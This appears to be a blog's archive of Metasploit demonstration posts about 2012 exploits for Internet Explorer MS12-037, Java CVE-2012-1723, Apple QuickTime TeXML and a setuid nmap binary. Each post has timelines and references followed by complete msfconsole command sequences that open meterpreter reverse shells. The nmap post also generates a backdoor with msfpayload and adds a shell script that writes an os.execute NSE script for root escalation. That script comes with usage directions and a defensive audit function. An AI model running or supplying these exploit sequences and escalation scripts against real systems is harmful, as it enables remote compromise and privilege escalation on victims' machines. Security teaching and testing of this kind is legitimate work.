Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

MS12-037 Internet Explorer CVE-2012-1876 Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by VUPEN Security and reported to ZDI
Vulnerability reported to the vendor by ZDI on 2012-03-14
Public release of the vulnerability on 2012-06-12
Details of the vulnerability published by VUPEN on 2012-07-10
Metasploit PoC provided on 2012-07-31

PoC provided by :

Alexandre Pelletier
mr_me
binjo
sinn3r
juan vazquez

Reference(s) :

MS12-037
CVE-2012-1876
OSVDB-82866
ZDI-12-093

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9

Tested on Windows XP Pro SP3 with :

Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP

Description :

This module exploits a heap overflow vulnerability in Internet Explorer caused by an incorrect handling of the span attribute for col elements from a fixed table, when they are modified dynamically by javascript code.

Commands :

use exploit/windows/browser/ms12_037_ie_colspan
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Setuid Nmap Exploit Metasploit Demo

Timeline :

Metasploit PoC provided on 2012-06-13

PoC provided by :

egypt

Reference(s) :

None

Affected version(s) :

Any Nmap version installed with the setuid bit set

Tested on CentOS release 6.2 with :

Nmap 6.01

Description :

Nmap’s man page mentions that “Nmap should never be installed with special privileges (e.g. suid root) for security reasons..” and specifically avoids making any of its binaries setuid during installation. Nevertheless, administrators sometimes feel the need to do insecure things. This module abuses a setuid nmap binary by writing out a lua nse script containing a call to os.execute(). Note that modern interpreters will refuse to run scripts on the command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby} payloads will most likely not work.
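Two things a practitioner wants alongside that description: a quick way to audit a host for the precondition (an nmap binary carrying the setuid bit), and a look at the kind of NSE script the abuse relies on. The script below is an added illustration written for this post, not the Metasploit module's code, and the NSE text it emits is a constructed minimal prerule script (the exact script the module writes is not reproduced here). Paths passed to find_setuid_nmap are whatever the caller supplies.

```bash
#!/bin/sh
# Added example (not the Metasploit module's code).
#
# find_setuid_nmap DIR...  : list files named "nmap" below DIR that have the
#                            setuid bit set (mode 4xxx), i.e. the condition
#                            the setuid_nmap module abuses.
# nse_exec_script CMD      : print a minimal NSE script whose prerule action
#                            calls os.execute(CMD). Run through a setuid-root
#                            nmap, CMD executes with EUID 0.
# audit DIR...             : exit 0 and print hits if a setuid nmap exists,
#                            exit 1 otherwise (handy in a hardening check).

find_setuid_nmap() {
    # -perm -4000 matches any file with the setuid bit, whatever the other
    # mode bits are. Owner is deliberately not filtered so the function can
    # be exercised as an unprivileged user; in a real audit add -user root.
    find "$@" -type f -name nmap -perm -4000 2>/dev/null
}

nse_exec_script() {
    cmd="$1"
    # Constructed NSE script: a prerule runs once before any host is scanned,
    # so no reachable target is needed for the action to fire.
    cat <<EOF
-- constructed illustration of an os.execute() NSE script
local os = require "os"
prerule = function() return true end
action = function()
  os.execute("$cmd")
end
EOF
}

audit() {
    hits=$(find_setuid_nmap "$@")
    if [ -n "$hits" ]; then
        printf '%s\n' "$hits"
        return 0
    fi
    return 1
}
```

To use the emitted script you would save it to a file and run nmap --script=/path/to/that.nse against any address; NSE accepts a path to a script outside its own script directory. The audit function is the defensive side of the same fact: if it prints anything, the binary should have its setuid bit removed, exactly as the nmap man page advises. Note that the interpreter restriction quoted above (refusing scripts when EUID != UID) does not apply to nmap's embedded Lua, which is why the module reaches for NSE rather than a perl or ruby payload.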

Commands :

This local exploit needs an existing session on the target; in this demo the session is obtained through a backdoor generated with msfpayload.

sudo msfpayload linux/x86/meterpreter/reverse_tcp  LHOST=192.168.178.100 X > backdoor

Upload the backdoor on the target

use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid

use exploit/unix/local/setuid_nmap
set Nmap /usr/local/bin/nmap
set SESSION 1
set TARGET 1
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-1723 Oracle Java Applet Field Bytecode Verifier Cache RCE Metasploit Demo

Timeline :

Public release of the vulnerability on 2012-06-12
First PoC provided by Michael Schierl on 2012-06-13
Metasploit PoC provided on 2012-07-09

PoC provided by :

Stefan Cornellius
mihi
littlelightlittlefire
juan vazquez
sinn3r

Reference(s) :

CVE-2012-1723
OSVDB-82877
BID-52161
Oracle Java SE Critical Patch Update Advisory – June 2012

Affected version(s) :

Oracle Java JSE 7 Update 4 and before
Oracle Java JSE 6 Update 32 and before
Oracle Java JSE 5 Update 35 and before
Oracle Java JSE 1.4.2_37 and before

Tested on Windows XP Pro SP3 with :

Oracle JSE 1.6.0_32-b05

Description :

This module exploits a vulnerability in the HotSpot bytecode verifier where an invalid optimisation of the GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checks. This provides a way to escape the JRE sandbox and load additional classes in order to perform malicious operations.

Commands :

use exploit/multi/browser/java_verifier_field_access
set SRVHOST 192.168.178.100
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-0663 Apple QuickTime TeXML BoF Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by Alexander Gavrun
Vulnerability reported to ZDI by Alexander Gavrun
Vulnerability reported by ZDI to the vendor on 2011-10-21
Coordinated public release of the vulnerability on 2012-06-12
Metasploit PoC provided on 2012-06-27

PoC provided by :

Alexander Gavrun
sinn3r
juan vazquez

Reference(s) :

CVE-2012-0663
OSVDB-81934
BID-53571
ZDI-12-107
HT1222

Affected version(s) :

QuickTime version 7.7.1 and previous

Tested on Windows XP Pro SP3 with :

QuickTime 7.7.1

Description :

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow and then gain arbitrary code execution in the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly: it copies user-supplied data onto the stack without adequate length checks, which results in the overflow.

Commands :

use exploit/windows/fileformat/apple_quicktime_texml
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid